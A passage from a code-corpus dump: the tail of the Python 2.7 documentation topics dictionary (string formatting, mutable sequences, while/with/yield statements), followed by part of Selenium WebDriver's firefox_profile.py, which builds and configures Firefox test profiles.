a dictionary).\n' '\n' 'A conversion specifier contains two or more characters and has ' 'the\n' 'following components, which must occur in this order:\n' '\n' '1. The "\'%\'" character, which marks the start of the ' 'specifier.\n' '\n' '2. Mapping key (optional), consisting of a parenthesised ' 'sequence\n' ' of characters (for example, "(somename)").\n' '\n' '3. Conversion flags (optional), which affect the result of some\n' ' conversion types.\n' '\n' '4. Minimum field width (optional). 
If specified as an "\'*\'"\n' ' (asterisk), the actual width is read from the next element of ' 'the\n' ' tuple in *values*, and the object to convert comes after the\n' ' minimum field width and optional precision.\n' '\n' '5. Precision (optional), given as a "\'.\'" (dot) followed by ' 'the\n' ' precision. If specified as "\'*\'" (an asterisk), the actual ' 'width\n' ' is read from the next element of the tuple in *values*, and ' 'the\n' ' value to convert comes after the precision.\n' '\n' '6. Length modifier (optional).\n' '\n' '7. Conversion type.\n' '\n' 'When the right argument is a dictionary (or other mapping type), ' 'then\n' 'the formats in the string *must* include a parenthesised mapping ' 'key\n' 'into that dictionary inserted immediately after the "\'%\'" ' 'character.\n' 'The mapping key selects the value to be formatted from the ' 'mapping.\n' 'For example:\n' '\n' ">>> print '%(language)s has %(number)03d quote types.' % \\\n" '... {"language": "Python", "number": 2}\n' 'Python has 002 quote types.\n' '\n' 'In this case no "*" specifiers may occur in a format (since ' 'they\n' 'require a sequential parameter list).\n' '\n' 'The conversion flag characters are:\n' '\n' '+-----------+-----------------------------------------------------------------------+\n' '| Flag | ' 'Meaning ' '|\n' '+===========+=======================================================================+\n' '| "\'#\'" | The value conversion will use the "alternate ' 'form" (where defined |\n' '| | ' 'below). ' '|\n' '+-----------+-----------------------------------------------------------------------+\n' '| "\'0\'" | The conversion will be zero padded for numeric ' 'values. |\n' '+-----------+-----------------------------------------------------------------------+\n' '| "\'-\'" | The converted value is left adjusted (overrides ' 'the "\'0\'" conversion |\n' '| | if both are ' 'given). 
|\n' '+-----------+-----------------------------------------------------------------------+\n' '| "\' \'" | (a space) A blank should be left before a ' 'positive number (or empty |\n' '| | string) produced by a signed ' 'conversion. |\n' '+-----------+-----------------------------------------------------------------------+\n' '| "\'+\'" | A sign character ("\'+\'" or "\'-\'") will ' 'precede the conversion |\n' '| | (overrides a "space" ' 'flag). |\n' '+-----------+-----------------------------------------------------------------------+\n' '\n' 'A length modifier ("h", "l", or "L") may be present, but is ' 'ignored as\n' 'it is not necessary for Python -- so e.g. "%ld" is identical to ' '"%d".\n' '\n' 'The conversion types are:\n' '\n' '+--------------+-------------------------------------------------------+---------+\n' '| Conversion | ' 'Meaning | Notes ' '|\n' '+==============+=======================================================+=========+\n' '| "\'d\'" | Signed integer ' 'decimal. | |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'i\'" | Signed integer ' 'decimal. | |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'o\'" | Signed octal ' 'value. | (1) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'u\'" | Obsolete type -- it is identical to ' '"\'d\'". | (7) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'x\'" | Signed hexadecimal ' '(lowercase). | (2) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'X\'" | Signed hexadecimal ' '(uppercase). | (2) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'e\'" | Floating point exponential format ' '(lowercase). 
| (3) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'E\'" | Floating point exponential format ' '(uppercase). | (3) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'f\'" | Floating point decimal ' 'format. | (3) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'F\'" | Floating point decimal ' 'format. | (3) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'g\'" | Floating point format. Uses lowercase ' 'exponential | (4) |\n' '| | format if exponent is less than -4 or not less ' 'than | |\n' '| | precision, decimal format ' 'otherwise. | |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'G\'" | Floating point format. Uses uppercase ' 'exponential | (4) |\n' '| | format if exponent is less than -4 or not less ' 'than | |\n' '| | precision, decimal format ' 'otherwise. | |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'c\'" | Single character (accepts integer or single ' 'character | |\n' '| | ' 'string). | ' '|\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'r\'" | String (converts any Python object using ' 'repr()). | (5) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'s\'" | String (converts any Python object using ' '"str()"). | (6) |\n' '+--------------+-------------------------------------------------------+---------+\n' '| "\'%\'" | No argument is converted, results in a ' '"\'%\'" | |\n' '| | character in the ' 'result. | |\n' '+--------------+-------------------------------------------------------+---------+\n' '\n' 'Notes:\n' '\n' '1. 
The alternate form causes a leading zero ("\'0\'") to be ' 'inserted\n' ' between left-hand padding and the formatting of the number if ' 'the\n' ' leading character of the result is not already a zero.\n' '\n' '2. The alternate form causes a leading "\'0x\'" or "\'0X\'" ' '(depending\n' ' on whether the "\'x\'" or "\'X\'" format was used) to be ' 'inserted\n' ' between left-hand padding and the formatting of the number if ' 'the\n' ' leading character of the result is not already a zero.\n' '\n' '3. The alternate form causes the result to always contain a ' 'decimal\n' ' point, even if no digits follow it.\n' '\n' ' The precision determines the number of digits after the ' 'decimal\n' ' point and defaults to 6.\n' '\n' '4. The alternate form causes the result to always contain a ' 'decimal\n' ' point, and trailing zeroes are not removed as they would ' 'otherwise\n' ' be.\n' '\n' ' The precision determines the number of significant digits ' 'before\n' ' and after the decimal point and defaults to 6.\n' '\n' '5. The "%r" conversion was added in Python 2.0.\n' '\n' ' The precision determines the maximal number of characters ' 'used.\n' '\n' '6. If the object or format provided is a "unicode" string, the\n' ' resulting string will also be "unicode".\n' '\n' ' The precision determines the maximal number of characters ' 'used.\n' '\n' '7. See **PEP 237**.\n' '\n' 'Since Python strings have an explicit length, "%s" conversions ' 'do not\n' 'assume that "\'\\0\'" is the end of the string.\n' '\n' 'Changed in version 2.7: "%f" conversions for numbers whose ' 'absolute\n' 'value is over 1e50 are no longer replaced by "%g" conversions.\n' '\n' 'Additional string operations are defined in standard modules ' '"string"\n' 'and "re".\n' '\n' '\n' 'XRange Type\n' '===========\n' '\n' 'The "xrange" type is an immutable sequence which is commonly ' 'used for\n' 'looping. 
The advantage of the "xrange" type is that an ' '"xrange"\n' 'object will always take the same amount of memory, no matter the ' 'size\n' 'of the range it represents. There are no consistent ' 'performance\n' 'advantages.\n' '\n' 'XRange objects have very little behavior: they only support ' 'indexing,\n' 'iteration, and the "len()" function.\n' '\n' '\n' 'Mutable Sequence Types\n' '======================\n' '\n' 'List and "bytearray" objects support additional operations that ' 'allow\n' 'in-place modification of the object. Other mutable sequence ' 'types\n' '(when added to the language) should also support these ' 'operations.\n' 'Strings and tuples are immutable sequence types: such objects ' 'cannot\n' 'be modified once created. The following operations are defined ' 'on\n' 'mutable sequence types (where *x* is an arbitrary object):\n' '\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| Operation | ' 'Result | Notes |\n' '+================================+==================================+=======================+\n' '| "s[i] = x" | item *i* of *s* is replaced ' 'by | |\n' '| | ' '*x* | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s[i:j] = t" | slice of *s* from *i* to *j* ' 'is | |\n' '| | replaced by the contents of ' 'the | |\n' '| | iterable ' '*t* | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "del s[i:j]" | same as "s[i:j] = ' '[]" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s[i:j:k] = t" | the elements of "s[i:j:k]" ' 'are | (1) |\n' '| | replaced by those of ' '*t* | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "del s[i:j:k]" | removes the elements ' 'of | |\n' '| | "s[i:j:k]" from the ' 'list | |\n' 
'+--------------------------------+----------------------------------+-----------------------+\n' '| "s.append(x)" | same as "s[len(s):len(s)] = ' '[x]" | (2) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.extend(x)" or "s += t" | for the most part the same ' 'as | (3) |\n' '| | "s[len(s):len(s)] = ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s *= n" | updates *s* with its ' 'contents | (11) |\n' '| | repeated *n* ' 'times | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.count(x)" | return number of *i*\'s for ' 'which | |\n' '| | "s[i] == ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.index(x[, i[, j]])" | return smallest *k* such ' 'that | (4) |\n' '| | "s[k] == x" and "i <= k < ' 'j" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.insert(i, x)" | same as "s[i:i] = ' '[x]" | (5) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.pop([i])" | same as "x = s[i]; del ' 's[i]; | (6) |\n' '| | return ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.remove(x)" | same as "del ' 's[s.index(x)]" | (4) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.reverse()" | reverses the items of *s* ' 'in | (7) |\n' '| | ' 'place | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.sort([cmp[, key[, | sort the items of *s* in ' 'place | (7)(8)(9)(10) |\n' '| reverse]]])" ' '| | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '\n' 'Notes:\n' '\n' '1. 
*t* must have the same length as the slice it is replacing.\n' '\n' '2. The C implementation of Python has historically accepted\n' ' multiple parameters and implicitly joined them into a tuple; ' 'this\n' ' no longer works in Python 2.0. Use of this misfeature has ' 'been\n' ' deprecated since Python 1.4.\n' '\n' '3. *x* can be any iterable object.\n' '\n' '4. Raises "ValueError" when *x* is not found in *s*. When a\n' ' negative index is passed as the second or third parameter to ' 'the\n' ' "index()" method, the list length is added, as for slice ' 'indices.\n' ' If it is still negative, it is truncated to zero, as for ' 'slice\n' ' indices.\n' '\n' ' Changed in version 2.3: Previously, "index()" didn\'t have ' 'arguments\n' ' for specifying start and stop positions.\n' '\n' '5. When a negative index is passed as the first parameter to ' 'the\n' ' "insert()" method, the list length is added, as for slice ' 'indices.\n' ' If it is still negative, it is truncated to zero, as for ' 'slice\n' ' indices.\n' '\n' ' Changed in version 2.3: Previously, all negative indices ' 'were\n' ' truncated to zero.\n' '\n' '6. The "pop()" method\'s optional argument *i* defaults to "-1", ' 'so\n' ' that by default the last item is removed and returned.\n' '\n' '7. The "sort()" and "reverse()" methods modify the list in ' 'place\n' ' for economy of space when sorting or reversing a large list. ' 'To\n' " remind you that they operate by side effect, they don't " 'return the\n' ' sorted or reversed list.\n' '\n' '8. The "sort()" method takes optional arguments for controlling ' 'the\n' ' comparisons.\n' '\n' ' *cmp* specifies a custom comparison function of two arguments ' '(list\n' ' items) which should return a negative, zero or positive ' 'number\n' ' depending on whether the first argument is considered smaller ' 'than,\n' ' equal to, or larger than the second argument: "cmp=lambda ' 'x,y:\n' ' cmp(x.lower(), y.lower())". 
The default value is "None".\n' '\n' ' *key* specifies a function of one argument that is used to ' 'extract\n' ' a comparison key from each list element: "key=str.lower". ' 'The\n' ' default value is "None".\n' '\n' ' *reverse* is a boolean value. If set to "True", then the ' 'list\n' ' elements are sorted as if each comparison were reversed.\n' '\n' ' In general, the *key* and *reverse* conversion processes are ' 'much\n' ' faster than specifying an equivalent *cmp* function. This ' 'is\n' ' because *cmp* is called multiple times for each list element ' 'while\n' ' *key* and *reverse* touch each element only once. Use\n' ' "functools.cmp_to_key()" to convert an old-style *cmp* ' 'function to\n' ' a *key* function.\n' '\n' ' Changed in version 2.3: Support for "None" as an equivalent ' 'to\n' ' omitting *cmp* was added.\n' '\n' ' Changed in version 2.4: Support for *key* and *reverse* was ' 'added.\n' '\n' '9. Starting with Python 2.3, the "sort()" method is guaranteed ' 'to\n' ' be stable. A sort is stable if it guarantees not to change ' 'the\n' ' relative order of elements that compare equal --- this is ' 'helpful\n' ' for sorting in multiple passes (for example, sort by ' 'department,\n' ' then by salary grade).\n' '\n' '10. **CPython implementation detail:** While a list is being\n' ' sorted, the effect of attempting to mutate, or even inspect, ' 'the\n' ' list is undefined. The C implementation of Python 2.3 and ' 'newer\n' ' makes the list appear empty for the duration, and raises\n' ' "ValueError" if it can detect that the list has been ' 'mutated\n' ' during a sort.\n' '\n' '11. The value *n* is an integer, or an object implementing\n' ' "__index__()". Zero and negative values of *n* clear the\n' ' sequence. 
Items in the sequence are not copied; they are\n' ' referenced multiple times, as explained for "s * n" under ' 'Sequence\n' ' Types --- str, unicode, list, tuple, bytearray, buffer, ' 'xrange.\n', 'typesseq-mutable': '\n' 'Mutable Sequence Types\n' '**********************\n' '\n' 'List and "bytearray" objects support additional ' 'operations that allow\n' 'in-place modification of the object. Other mutable ' 'sequence types\n' '(when added to the language) should also support these ' 'operations.\n' 'Strings and tuples are immutable sequence types: such ' 'objects cannot\n' 'be modified once created. The following operations are ' 'defined on\n' 'mutable sequence types (where *x* is an arbitrary ' 'object):\n' '\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| Operation | ' 'Result | Notes ' '|\n' '+================================+==================================+=======================+\n' '| "s[i] = x" | item *i* of *s* is ' 'replaced by | |\n' '| | ' '*x* | ' '|\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s[i:j] = t" | slice of *s* from *i* ' 'to *j* is | |\n' '| | replaced by the ' 'contents of the | |\n' '| | iterable ' '*t* | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "del s[i:j]" | same as "s[i:j] = ' '[]" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s[i:j:k] = t" | the elements of ' '"s[i:j:k]" are | (1) |\n' '| | replaced by those of ' '*t* | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "del s[i:j:k]" | removes the elements ' 'of | |\n' '| | "s[i:j:k]" from the ' 'list | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.append(x)" | same as ' '"s[len(s):len(s)] = [x]" | (2) |\n' 
'+--------------------------------+----------------------------------+-----------------------+\n' '| "s.extend(x)" or "s += t" | for the most part the ' 'same as | (3) |\n' '| | "s[len(s):len(s)] = ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s *= n" | updates *s* with its ' 'contents | (11) |\n' '| | repeated *n* ' 'times | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.count(x)" | return number of ' "*i*'s for which | |\n" '| | "s[i] == ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.index(x[, i[, j]])" | return smallest *k* ' 'such that | (4) |\n' '| | "s[k] == x" and "i <= ' 'k < j" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.insert(i, x)" | same as "s[i:i] = ' '[x]" | (5) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.pop([i])" | same as "x = s[i]; ' 'del s[i]; | (6) |\n' '| | return ' 'x" | |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.remove(x)" | same as "del ' 's[s.index(x)]" | (4) |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.reverse()" | reverses the items of ' '*s* in | (7) |\n' '| | ' 'place | ' '|\n' '+--------------------------------+----------------------------------+-----------------------+\n' '| "s.sort([cmp[, key[, | sort the items of *s* ' 'in place | (7)(8)(9)(10) |\n' '| reverse]]])" ' '| ' '| |\n' '+--------------------------------+----------------------------------+-----------------------+\n' '\n' 'Notes:\n' '\n' '1. *t* must have the same length as the slice it is ' 'replacing.\n' '\n' '2. 
The C implementation of Python has historically ' 'accepted\n' ' multiple parameters and implicitly joined them into a ' 'tuple; this\n' ' no longer works in Python 2.0. Use of this ' 'misfeature has been\n' ' deprecated since Python 1.4.\n' '\n' '3. *x* can be any iterable object.\n' '\n' '4. Raises "ValueError" when *x* is not found in *s*. ' 'When a\n' ' negative index is passed as the second or third ' 'parameter to the\n' ' "index()" method, the list length is added, as for ' 'slice indices.\n' ' If it is still negative, it is truncated to zero, as ' 'for slice\n' ' indices.\n' '\n' ' Changed in version 2.3: Previously, "index()" didn\'t ' 'have arguments\n' ' for specifying start and stop positions.\n' '\n' '5. When a negative index is passed as the first ' 'parameter to the\n' ' "insert()" method, the list length is added, as for ' 'slice indices.\n' ' If it is still negative, it is truncated to zero, as ' 'for slice\n' ' indices.\n' '\n' ' Changed in version 2.3: Previously, all negative ' 'indices were\n' ' truncated to zero.\n' '\n' '6. The "pop()" method\'s optional argument *i* defaults ' 'to "-1", so\n' ' that by default the last item is removed and ' 'returned.\n' '\n' '7. The "sort()" and "reverse()" methods modify the list ' 'in place\n' ' for economy of space when sorting or reversing a ' 'large list. To\n' ' remind you that they operate by side effect, they ' "don't return the\n" ' sorted or reversed list.\n' '\n' '8. The "sort()" method takes optional arguments for ' 'controlling the\n' ' comparisons.\n' '\n' ' *cmp* specifies a custom comparison function of two ' 'arguments (list\n' ' items) which should return a negative, zero or ' 'positive number\n' ' depending on whether the first argument is considered ' 'smaller than,\n' ' equal to, or larger than the second argument: ' '"cmp=lambda x,y:\n' ' cmp(x.lower(), y.lower())". 
The default value is ' '"None".\n' '\n' ' *key* specifies a function of one argument that is ' 'used to extract\n' ' a comparison key from each list element: ' '"key=str.lower". The\n' ' default value is "None".\n' '\n' ' *reverse* is a boolean value. If set to "True", then ' 'the list\n' ' elements are sorted as if each comparison were ' 'reversed.\n' '\n' ' In general, the *key* and *reverse* conversion ' 'processes are much\n' ' faster than specifying an equivalent *cmp* function. ' 'This is\n' ' because *cmp* is called multiple times for each list ' 'element while\n' ' *key* and *reverse* touch each element only once. ' 'Use\n' ' "functools.cmp_to_key()" to convert an old-style ' '*cmp* function to\n' ' a *key* function.\n' '\n' ' Changed in version 2.3: Support for "None" as an ' 'equivalent to\n' ' omitting *cmp* was added.\n' '\n' ' Changed in version 2.4: Support for *key* and ' '*reverse* was added.\n' '\n' '9. Starting with Python 2.3, the "sort()" method is ' 'guaranteed to\n' ' be stable. A sort is stable if it guarantees not to ' 'change the\n' ' relative order of elements that compare equal --- ' 'this is helpful\n' ' for sorting in multiple passes (for example, sort by ' 'department,\n' ' then by salary grade).\n' '\n' '10. **CPython implementation detail:** While a list is ' 'being\n' ' sorted, the effect of attempting to mutate, or even ' 'inspect, the\n' ' list is undefined. The C implementation of Python ' '2.3 and newer\n' ' makes the list appear empty for the duration, and ' 'raises\n' ' "ValueError" if it can detect that the list has been ' 'mutated\n' ' during a sort.\n' '\n' '11. The value *n* is an integer, or an object ' 'implementing\n' ' "__index__()". Zero and negative values of *n* ' 'clear the\n' ' sequence. 
Items in the sequence are not copied; ' 'they are\n' ' referenced multiple times, as explained for "s * n" ' 'under Sequence\n' ' Types --- str, unicode, list, tuple, bytearray, ' 'buffer, xrange.\n', 'unary': '\n' 'Unary arithmetic and bitwise operations\n' '***************************************\n' '\n' 'All unary arithmetic and bitwise operations have the same ' 'priority:\n' '\n' ' u_expr ::= power | "-" u_expr | "+" u_expr | "~" u_expr\n' '\n' 'The unary "-" (minus) operator yields the negation of its numeric\n' 'argument.\n' '\n' 'The unary "+" (plus) operator yields its numeric argument ' 'unchanged.\n' '\n' 'The unary "~" (invert) operator yields the bitwise inversion of ' 'its\n' 'plain or long integer argument. The bitwise inversion of "x" is\n' 'defined as "-(x+1)". It only applies to integral numbers.\n' '\n' 'In all three cases, if the argument does not have the proper type, ' 'a\n' '"TypeError" exception is raised.\n', 'while': '\n' 'The "while" statement\n' '*********************\n' '\n' 'The "while" statement is used for repeated execution as long as an\n' 'expression is true:\n' '\n' ' while_stmt ::= "while" expression ":" suite\n' ' ["else" ":" suite]\n' '\n' 'This repeatedly tests the expression and, if it is true, executes ' 'the\n' 'first suite; if the expression is false (which may be the first ' 'time\n' 'it is tested) the suite of the "else" clause, if present, is ' 'executed\n' 'and the loop terminates.\n' '\n' 'A "break" statement executed in the first suite terminates the ' 'loop\n' 'without executing the "else" clause\'s suite. A "continue" ' 'statement\n' 'executed in the first suite skips the rest of the suite and goes ' 'back\n' 'to testing the expression.\n', 'with': '\n' 'The "with" statement\n' '********************\n' '\n' 'New in version 2.5.\n' '\n' 'The "with" statement is used to wrap the execution of a block with\n' 'methods defined by a context manager (see section With Statement\n' 'Context Managers). 
This allows common "try"..."except"..."finally"\n' 'usage patterns to be encapsulated for convenient reuse.\n' '\n' ' with_stmt ::= "with" with_item ("," with_item)* ":" suite\n' ' with_item ::= expression ["as" target]\n' '\n' 'The execution of the "with" statement with one "item" proceeds as\n' 'follows:\n' '\n' '1. The context expression (the expression given in the "with_item")\n' ' is evaluated to obtain a context manager.\n' '\n' '2. The context manager\'s "__exit__()" is loaded for later use.\n' '\n' '3. The context manager\'s "__enter__()" method is invoked.\n' '\n' '4. If a target was included in the "with" statement, the return\n' ' value from "__enter__()" is assigned to it.\n' '\n' ' Note: The "with" statement guarantees that if the "__enter__()"\n' ' method returns without an error, then "__exit__()" will always ' 'be\n' ' called. Thus, if an error occurs during the assignment to the\n' ' target list, it will be treated the same as an error occurring\n' ' within the suite would be. See step 6 below.\n' '\n' '5. The suite is executed.\n' '\n' '6. The context manager\'s "__exit__()" method is invoked. If an\n' ' exception caused the suite to be exited, its type, value, and\n' ' traceback are passed as arguments to "__exit__()". 
Otherwise, ' 'three\n' ' "None" arguments are supplied.\n' '\n' ' If the suite was exited due to an exception, and the return ' 'value\n' ' from the "__exit__()" method was false, the exception is ' 'reraised.\n' ' If the return value was true, the exception is suppressed, and\n' ' execution continues with the statement following the "with"\n' ' statement.\n' '\n' ' If the suite was exited for any reason other than an exception, ' 'the\n' ' return value from "__exit__()" is ignored, and execution ' 'proceeds\n' ' at the normal location for the kind of exit that was taken.\n' '\n' 'With more than one item, the context managers are processed as if\n' 'multiple "with" statements were nested:\n' '\n' ' with A() as a, B() as b:\n' ' suite\n' '\n' 'is equivalent to\n' '\n' ' with A() as a:\n' ' with B() as b:\n' ' suite\n' '\n' 'Note: In Python 2.5, the "with" statement is only allowed when the\n' ' "with_statement" feature has been enabled. It is always enabled ' 'in\n' ' Python 2.6.\n' '\n' 'Changed in version 2.7: Support for multiple context expressions.\n' '\n' 'See also:\n' '\n' ' **PEP 343** - The "with" statement\n' ' The specification, background, and examples for the Python ' '"with"\n' ' statement.\n', 'yield': '\n' 'The "yield" statement\n' '*********************\n' '\n' ' yield_stmt ::= yield_expression\n' '\n' 'The "yield" statement is only used when defining a generator ' 'function,\n' 'and is only used in the body of the generator function. Using a\n' '"yield" statement in a function definition is sufficient to cause ' 'that\n' 'definition to create a generator function instead of a normal\n' 'function.\n' '\n' 'When a generator function is called, it returns an iterator known ' 'as a\n' 'generator iterator, or more commonly, a generator. 
The body of ' 'the\n' "generator function is executed by calling the generator's " '"next()"\n' 'method repeatedly until it raises an exception.\n' '\n' 'When a "yield" statement is executed, the state of the generator ' 'is\n' 'frozen and the value of "expression_list" is returned to ' '"next()"\'s\n' 'caller. By "frozen" we mean that all local state is retained,\n' 'including the current bindings of local variables, the instruction\n' 'pointer, and the internal evaluation stack: enough information is\n' 'saved so that the next time "next()" is invoked, the function can\n' 'proceed exactly as if the "yield" statement were just another ' 'external\n' 'call.\n' '\n' 'As of Python version 2.5, the "yield" statement is now allowed in ' 'the\n' '"try" clause of a "try" ... "finally" construct. If the generator ' 'is\n' 'not resumed before it is finalized (by reaching a zero reference ' 'count\n' "or by being garbage collected), the generator-iterator's " '"close()"\n' 'method will be called, allowing any pending "finally" clauses to\n' 'execute.\n' '\n' 'For full details of "yield" semantics, refer to the Yield ' 'expressions\n' 'section.\n' '\n' 'Note: In Python 2.2, the "yield" statement was only allowed when ' 'the\n' ' "generators" feature has been enabled. This "__future__" import\n' ' statement was used to enable the feature:\n' '\n' ' from __future__ import generators\n' '\n' 'See also:\n' '\n' ' **PEP 255** - Simple Generators\n' ' The proposal for adding generators and the "yield" statement ' 'to\n' ' Python.\n' '\n' ' **PEP 342** - Coroutines via Enhanced Generators\n' ' The proposal that, among other generator enhancements, ' 'proposed\n' ' allowing "yield" to appear inside a "try" ... "finally" ' 'block.\n'}
mit
kenshay/ImageScripter
ProgramData/SystemFiles/Python/Lib/site-packages/selenium/webdriver/firefox/firefox_profile.py
2
14867
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from __future__ import with_statement import base64 import copy import json import os import re import shutil import sys import tempfile import zipfile try: from cStringIO import StringIO as BytesIO except ImportError: from io import BytesIO from xml.dom import minidom from selenium.webdriver.common.proxy import ProxyType from selenium.common.exceptions import WebDriverException WEBDRIVER_EXT = "webdriver.xpi" WEBDRIVER_PREFERENCES = "webdriver_prefs.json" EXTENSION_NAME = "fxdriver@googlecode.com" class AddonFormatError(Exception): """Exception for not well-formed add-on manifest files""" class FirefoxProfile(object): ANONYMOUS_PROFILE_NAME = "WEBDRIVER_ANONYMOUS_PROFILE" DEFAULT_PREFERENCES = None def __init__(self, profile_directory=None): """ Initialises a new instance of a Firefox Profile :args: - profile_directory: Directory of profile that you want to use. This defaults to None and will create a new directory when object is created. 
""" if not FirefoxProfile.DEFAULT_PREFERENCES: with open(os.path.join(os.path.dirname(__file__), WEBDRIVER_PREFERENCES)) as default_prefs: FirefoxProfile.DEFAULT_PREFERENCES = json.load(default_prefs) self.default_preferences = copy.deepcopy( FirefoxProfile.DEFAULT_PREFERENCES['mutable']) self.native_events_enabled = True self.profile_dir = profile_directory self.tempfolder = None if self.profile_dir is None: self.profile_dir = self._create_tempfolder() else: self.tempfolder = tempfile.mkdtemp() newprof = os.path.join(self.tempfolder, "webdriver-py-profilecopy") shutil.copytree(self.profile_dir, newprof, ignore=shutil.ignore_patterns("parent.lock", "lock", ".parentlock")) self.profile_dir = newprof os.chmod(self.profile_dir, 0o755) self._read_existing_userjs(os.path.join(self.profile_dir, "user.js")) self.extensionsDir = os.path.join(self.profile_dir, "extensions") self.userPrefs = os.path.join(self.profile_dir, "user.js") if os.path.isfile(self.userPrefs): os.chmod(self.userPrefs, 0o644) # Public Methods def set_preference(self, key, value): """ sets the preference that we want in the profile. 
""" self.default_preferences[key] = value def add_extension(self, extension=WEBDRIVER_EXT): self._install_extension(extension) def update_preferences(self): for key, value in FirefoxProfile.DEFAULT_PREFERENCES['frozen'].items(): self.default_preferences[key] = value self._write_user_prefs(self.default_preferences) # Properties @property def path(self): """ Gets the profile directory that is currently being used """ return self.profile_dir @property def port(self): """ Gets the port that WebDriver is working on """ return self._port @port.setter def port(self, port): """ Sets the port that WebDriver will be running on """ if not isinstance(port, int): raise WebDriverException("Port needs to be an integer") try: port = int(port) if port < 1 or port > 65535: raise WebDriverException("Port number must be in the range 1..65535") except (ValueError, TypeError): raise WebDriverException("Port needs to be an integer") self._port = port self.set_preference("webdriver_firefox_port", self._port) @property def accept_untrusted_certs(self): return self.default_preferences["webdriver_accept_untrusted_certs"] @accept_untrusted_certs.setter def accept_untrusted_certs(self, value): if value not in [True, False]: raise WebDriverException("Please pass in a Boolean to this call") self.set_preference("webdriver_accept_untrusted_certs", value) @property def assume_untrusted_cert_issuer(self): return self.default_preferences["webdriver_assume_untrusted_issuer"] @assume_untrusted_cert_issuer.setter def assume_untrusted_cert_issuer(self, value): if value not in [True, False]: raise WebDriverException("Please pass in a Boolean to this call") self.set_preference("webdriver_assume_untrusted_issuer", value) @property def native_events_enabled(self): return self.default_preferences['webdriver_enable_native_events'] @native_events_enabled.setter def native_events_enabled(self, value): if value not in [True, False]: raise WebDriverException("Please pass in a Boolean to this call") 
self.set_preference("webdriver_enable_native_events", value) @property def encoded(self): """ A zipped, base64 encoded string of profile directory for use with remote WebDriver JSON wire protocol """ self.update_preferences() fp = BytesIO() zipped = zipfile.ZipFile(fp, 'w', zipfile.ZIP_DEFLATED) path_root = len(self.path) + 1 # account for trailing slash for base, dirs, files in os.walk(self.path): for fyle in files: filename = os.path.join(base, fyle) zipped.write(filename, filename[path_root:]) zipped.close() return base64.b64encode(fp.getvalue()).decode('UTF-8') def set_proxy(self, proxy): import warnings warnings.warn( "This method has been deprecated. Please pass in the proxy object to the Driver Object", DeprecationWarning, stacklevel=2) if proxy is None: raise ValueError("proxy can not be None") if proxy.proxy_type is ProxyType.UNSPECIFIED: return self.set_preference("network.proxy.type", proxy.proxy_type['ff_value']) if proxy.proxy_type is ProxyType.MANUAL: self.set_preference("network.proxy.no_proxies_on", proxy.no_proxy) self._set_manual_proxy_preference("ftp", proxy.ftp_proxy) self._set_manual_proxy_preference("http", proxy.http_proxy) self._set_manual_proxy_preference("ssl", proxy.ssl_proxy) self._set_manual_proxy_preference("socks", proxy.socks_proxy) elif proxy.proxy_type is ProxyType.PAC: self.set_preference("network.proxy.autoconfig_url", proxy.proxy_autoconfig_url) def _set_manual_proxy_preference(self, key, setting): if setting is None or setting is '': return host_details = setting.split(":") self.set_preference("network.proxy.%s" % key, host_details[0]) if len(host_details) > 1: self.set_preference("network.proxy.%s_port" % key, int(host_details[1])) def _create_tempfolder(self): """ Creates a temp folder to store User.js and the extension """ return tempfile.mkdtemp() def _write_user_prefs(self, user_prefs): """ writes the current user prefs dictionary to disk """ with open(self.userPrefs, "w") as f: for key, value in user_prefs.items(): 
